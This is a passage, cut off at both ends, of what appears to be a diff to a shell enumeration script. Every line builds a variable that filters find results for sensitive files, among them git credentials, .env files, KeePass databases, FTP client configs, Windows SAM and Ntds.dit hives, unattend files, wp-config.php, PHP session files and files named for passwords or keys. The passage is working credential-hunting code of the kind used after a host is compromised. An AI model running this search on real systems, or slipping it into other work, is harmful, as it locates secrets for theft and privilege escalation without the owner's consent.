"$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) - PSTORAGE_LDAPRC=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) - PSTORAGE_ENV=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "\.env$" | sort | uniq | head -n 70) - PSTORAGE_MSMTPRC=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) - PSTORAGE_GITHUB=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) - PSTORAGE_SVN=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "\.svn$" | sort | uniq | head -n 70) - PSTORAGE_KEEPASS=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) - PSTORAGE_FTP=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) - PSTORAGE_BIND=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "bind$" | sort | uniq | head -n 70) - PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "seeddms.*$" | sort | uniq | head -n 70) - PSTORAGE_DDCLIENT=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) - PSTORAGE_CACTI=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "cacti$" | sort | uniq | head -n 70) - PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) - PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) - PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|php\.ini$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) - PSTORAGE_DATABASE=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) - PSTORAGE_BACKUPS=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "backup$|backups$" | sort | uniq | head -n 70) - PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) + PSTORAGE_SYSTEMD=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/tmp|^$GREPHOMESEARCH|^/usr|^/srv|^/bin|^/lib32|^/sys|^/opt|^/snap|^/lib|^/.cache|^/applications|^/lib64|^/media|^/etc|^/run|^/sbin|^/cdrom|^/mnt|^/private|^/systemd|^/system|^/var" | grep -E ".*\.service$" | sort | uniq | head -n 70) + PSTORAGE_TIMER=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/tmp|^$GREPHOMESEARCH|^/usr|^/srv|^/bin|^/lib32|^/sys|^/opt|^/snap|^/lib|^/.cache|^/applications|^/lib64|^/media|^/etc|^/run|^/sbin|^/cdrom|^/mnt|^/private|^/systemd|^/system|^/var" | grep -E ".*\.timer$" | sort | uniq | head -n 70) + PSTORAGE_SOCKET=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/tmp|^$GREPHOMESEARCH|^/usr|^/srv|^/bin|^/lib32|^/sys|^/opt|^/snap|^/lib|^/.cache|^/applications|^/lib64|^/media|^/etc|^/run|^/sbin|^/cdrom|^/mnt|^/private|^/systemd|^/system|^/var" | grep -E ".*\.socket$" | sort | uniq | head -n 70) + PSTORAGE_DBUS=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) + PSTORAGE_MYSQL=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP\n$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "mysql$|debian\.cnf$" | sort | uniq | head -n 70) + PSTORAGE_POSTGRESQL=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) + PSTORAGE_APACHE=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP\n$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "sites-enabled$|000-default\.conf$" | sort | uniq | head -n 70) + PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/mnt|^/var|^/tmp" | grep -E "sess_.*$" | sort | uniq | head -n 70) + PSTORAGE_PHP_FILES=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_WORDPRESS=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) + PSTORAGE_DRUPAL=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E '/default/settings.php' | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_MOODLE=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E 'moodle/config.php' | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "config\.php$" | sort | uniq | head -n 70) + PSTORAGE_TOMCAT=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) + PSTORAGE_MONGO=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) + PSTORAGE_SUPERVISORD=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) + PSTORAGE_CESI=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E 